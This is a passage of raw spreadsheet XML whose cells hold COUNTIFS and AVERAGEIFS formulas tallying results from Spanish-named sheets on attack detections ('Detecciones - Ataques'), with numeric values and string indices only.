      <c r="Z126" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB126" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC126" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD126" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="127">
      <c r="B127" s="806"/>
      <c r="C127" s="806"/>
      <c r="F127" s="871"/>
      <c r="G127" s="871"/>
      <c r="H127" s="806"/>
      <c r="I127" s="806"/>
      <c r="K127" s="352" t="s">
        <v>1999</v>
      </c>
      <c r="L127" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M127" s="374">
        <f>'(D) - Análisis Resultados II - '!BR22</f>
        <v>1</v>
      </c>
      <c r="N127" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K127)</f>
        <v>1</v>
      </c>
      <c r="O127" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P127" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q127" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T127" s="865" t="s">
        <v>1999</v>
      </c>
      <c r="U127" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V127" s="69">
        <v>0.0</v>
      </c>
      <c r="W127" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T127)</f>
        <v>1</v>
      </c>
      <c r="X127" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y127" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z127" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB127" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC127" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD127" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="128">
      <c r="B128" s="806"/>
      <c r="C128" s="806"/>
      <c r="D128" s="871"/>
      <c r="E128" s="871"/>
      <c r="F128" s="871"/>
      <c r="G128" s="871"/>
      <c r="H128" s="806"/>
      <c r="I128" s="806"/>
      <c r="K128" s="352" t="s">
        <v>1971</v>
      </c>
      <c r="L128" s="867">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CD$131)
</f>
        <v>1</v>
      </c>
      <c r="M128" s="374">
        <f>'(D) - Análisis Resultados II - '!BS22</f>
        <v>1</v>
      </c>
      <c r="N128" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K128)</f>
        <v>1</v>
      </c>
      <c r="O128" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P128" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q128" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T128" s="865" t="s">
        <v>1971</v>
      </c>
      <c r="U128" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CD$131)
</f>
        <v>1</v>
      </c>
      <c r="V128" s="69">
        <v>1.0</v>
      </c>
      <c r="W128" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T128)</f>
        <v>1</v>
      </c>
      <c r="X128" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y128" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z128" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB128" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC128" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD128" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="129">
      <c r="B129" s="806"/>
      <c r="C129" s="806"/>
      <c r="D129" s="871"/>
      <c r="E129" s="871"/>
      <c r="F129" s="871"/>
      <c r="G129" s="871"/>
      <c r="H129" s="806"/>
      <c r="I129" s="806"/>
      <c r="K129" s="352" t="s">
        <v>1201</v>
      </c>
      <c r="L129" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M129" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!BT22</f>
        <v>-</v>
      </c>
      <c r="N129" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K129)</f>
        <v>0</v>
      </c>
      <c r="O129" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P129" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q129" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T129" s="865" t="s">
        <v>1201</v>
      </c>
      <c r="U129" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V129" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W129" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T129)</f>
        <v>0</v>
      </c>
      <c r="X129" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y129" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z129" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB129" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC129" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD129" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="130">
      <c r="B130" s="806"/>
      <c r="C130" s="806"/>
      <c r="D130" s="871"/>
      <c r="E130" s="871"/>
      <c r="F130" s="871"/>
      <c r="G130" s="871"/>
      <c r="H130" s="806"/>
      <c r="I130" s="806"/>
      <c r="K130" s="352" t="s">
        <v>750</v>
      </c>
      <c r="L130" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CF$131)
</f>
        <v>1</v>
      </c>
      <c r="M130" s="374">
        <f>'(D) - Análisis Resultados II - '!BU22</f>
        <v>0</v>
      </c>
      <c r="N130" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K130)</f>
        <v>1</v>
      </c>
      <c r="O130" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P130" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q130" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T130" s="865" t="s">
        <v>750</v>
      </c>
      <c r="U130" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CF$131)
</f>
        <v>1</v>
      </c>
      <c r="V130" s="69">
        <v>0.0</v>
      </c>
      <c r="W130" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T130)</f>
        <v>1</v>
      </c>
      <c r="X130" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y130" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z130" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB130" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC130" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD130" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="131">
      <c r="B131" s="873"/>
      <c r="C131" s="873"/>
      <c r="D131" s="871"/>
      <c r="E131" s="871"/>
      <c r="F131" s="871"/>
      <c r="G131" s="871"/>
      <c r="H131" s="873"/>
      <c r="I131" s="873"/>
      <c r="K131" s="352" t="s">
        <v>666</v>
      </c>
      <c r="L131" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M131" s="374">
        <f>'(D) - Análisis Resultados II - '!BV22</f>
        <v>1</v>
      </c>
      <c r="N131" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K131)</f>
        <v>1</v>
      </c>
      <c r="O131" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P131" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q131" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T131" s="865" t="s">
        <v>666</v>
      </c>
      <c r="U131" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V131" s="69">
        <v>0.0</v>
      </c>
      <c r="W131" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T131)</f>
        <v>1</v>
      </c>
      <c r="X131" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y131" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z131" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB131" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC131" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD131" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="132">
      <c r="B132" s="873"/>
      <c r="C132" s="873"/>
      <c r="D132" s="871"/>
      <c r="E132" s="871"/>
      <c r="F132" s="871"/>
      <c r="G132" s="871"/>
      <c r="H132" s="873"/>
      <c r="I132" s="873"/>
      <c r="K132" s="352" t="s">
        <v>892</v>
      </c>
      <c r="L132" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CH$131)
</f>
        <v>1</v>
      </c>
      <c r="M132" s="374">
        <f>'(D) - Análisis Resultados II - '!BW22</f>
        <v>0</v>
      </c>
      <c r="N132" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K132)</f>
        <v>1</v>
      </c>
      <c r="O132" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P132" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q132" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T132" s="865" t="s">
        <v>892</v>
      </c>
      <c r="U132" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CH$131)
</f>
        <v>1</v>
      </c>
      <c r="V132" s="69">
        <v>0.0</v>
      </c>
      <c r="W132" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T132)</f>
        <v>1</v>
      </c>
      <c r="X132" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y132" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z132" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB132" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC132" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD132" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="133">
      <c r="B133" s="873"/>
      <c r="C133" s="873"/>
      <c r="D133" s="871"/>
      <c r="E133" s="871"/>
      <c r="F133" s="871"/>
      <c r="G133" s="871"/>
      <c r="H133" s="873"/>
      <c r="I133" s="873"/>
      <c r="K133" s="352" t="s">
        <v>1214</v>
      </c>
      <c r="L133" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CI$131)
</f>
        <v>1</v>
      </c>
      <c r="M133" s="374">
        <f>'(D) - Análisis Resultados II - '!BX22</f>
        <v>1</v>
      </c>
      <c r="N133" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K133)</f>
        <v>1</v>
      </c>
      <c r="O133" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P133" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q133" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T133" s="865" t="s">
        <v>1214</v>
      </c>
      <c r="U133" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CI$131)
</f>
        <v>1</v>
      </c>
      <c r="V133" s="69">
        <v>1.0</v>
      </c>
      <c r="W133" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T133)</f>
        <v>1</v>
      </c>
      <c r="X133" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y133" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z133" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB133" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC133" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD133" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="134">
      <c r="B134" s="873"/>
      <c r="C134" s="873"/>
      <c r="D134" s="871"/>
      <c r="E134" s="871"/>
      <c r="F134" s="871"/>
      <c r="G134" s="871"/>
      <c r="H134" s="873"/>
      <c r="I134" s="873"/>
      <c r="K134" s="352" t="s">
        <v>1293</v>
      </c>
      <c r="L134" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M134" s="374">
        <f>'(D) - Análisis Resultados II - '!BY22</f>
        <v>0</v>
      </c>
      <c r="N134" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K134)</f>
        <v>1</v>
      </c>
      <c r="O134" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P134" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q134" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T134" s="865" t="s">
        <v>1293</v>
      </c>
      <c r="U134" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CJ$131)
</f>
        <v>0</v>
      </c>
      <c r="V134" s="69">
        <v>0.0</v>
      </c>
      <c r="W134" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T134)</f>
        <v>1</v>
      </c>
      <c r="X134" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y134" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z134" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB134" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC134" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD134" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="135">
      <c r="B135" s="873"/>
      <c r="C135" s="873"/>
      <c r="D135" s="871"/>
      <c r="E135" s="871"/>
      <c r="F135" s="871"/>
      <c r="G135" s="871"/>
      <c r="H135" s="873"/>
      <c r="I135" s="873"/>
      <c r="K135" s="352" t="s">
        <v>1331</v>
      </c>
      <c r="L135" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CK$131)
</f>
        <v>1</v>
      </c>
      <c r="M135" s="374">
        <f>'(D) - Análisis Resultados II - '!BZ22</f>
        <v>0</v>
      </c>
      <c r="N135" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K135)</f>
        <v>1</v>
      </c>
      <c r="O135" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P135" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q135" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T135" s="865" t="s">
        <v>1331</v>
      </c>
      <c r="U135" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CK$131)
</f>
        <v>1</v>
      </c>
      <c r="V135" s="69">
        <v>1.0</v>
      </c>
      <c r="W135" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T135)</f>
        <v>1</v>
      </c>
      <c r="X135" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y135" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z135" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB135" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC135" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD135" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="136">
      <c r="B136" s="873"/>
      <c r="C136" s="873"/>
      <c r="D136" s="873"/>
      <c r="E136" s="873"/>
      <c r="F136" s="873"/>
      <c r="G136" s="873"/>
      <c r="H136" s="873"/>
      <c r="I136" s="873"/>
      <c r="K136" s="352" t="s">
        <v>2215</v>
      </c>
      <c r="L136" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M136" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!CA22</f>
        <v>-</v>
      </c>
      <c r="N136" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K136)</f>
        <v>0</v>
      </c>
      <c r="O136" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P136" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q136" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T136" s="865" t="s">
        <v>2215</v>
      </c>
      <c r="U136" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V136" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W136" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T136)</f>
        <v>0</v>
      </c>
      <c r="X136" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y136" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z136" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB136" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC136" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD136" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="137">
      <c r="K137" s="352" t="s">
        <v>2261</v>
      </c>
      <c r="L137" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CM$131)
</f>
        <v>0</v>
      </c>
      <c r="M137" s="374">
        <f>'(D) - Análisis Resultados II - '!CB22</f>
        <v>1</v>
      </c>
      <c r="N137" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K137)</f>
        <v>2</v>
      </c>
      <c r="O137" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P137" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q137" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T137" s="865" t="s">
        <v>2261</v>
      </c>
      <c r="U137" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CM$131)
</f>
        <v>0</v>
      </c>
      <c r="V137" s="69">
        <v>1.0</v>
      </c>
      <c r="W137" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T137)</f>
        <v>2</v>
      </c>
      <c r="X137" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y137" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z137" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB137" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC137" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD137" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="138">
      <c r="K138" s="352" t="s">
        <v>359</v>
      </c>
      <c r="L138" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CN$131)
</f>
        <v>0</v>
      </c>
      <c r="M138" s="374">
        <f>'(D) - Análisis Resultados II - '!CC22</f>
        <v>1</v>
      </c>
      <c r="N138" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K138)</f>
        <v>1</v>
      </c>
      <c r="O138" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P138" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q138" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T138" s="865" t="s">
        <v>359</v>
      </c>
      <c r="U138" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CN$131)
</f>
        <v>0</v>
      </c>
      <c r="V138" s="69">
        <v>1.0</v>
      </c>
      <c r="W138" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T138)</f>
        <v>1</v>
      </c>
      <c r="X138" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y138" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z138" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB138" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC138" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD138" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="139">
      <c r="K139" s="352" t="s">
        <v>1230</v>
      </c>
      <c r="L139" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CO$131)
</f>
        <v>1</v>
      </c>
      <c r="M139" s="374">
        <f>'(D) - Análisis Resultados II - '!CD22</f>
        <v>1</v>
      </c>
      <c r="N139" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K139)</f>
        <v>2</v>
      </c>
      <c r="O139" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P139" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q139" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T139" s="865" t="s">
        <v>1230</v>
      </c>
      <c r="U139" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!CO$131)
</f>
        <v>1</v>
      </c>
      <c r="V139" s="69">
        <v>1.0</v>
      </c>
      <c r="W139" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T139)</f>
        <v>2</v>
      </c>
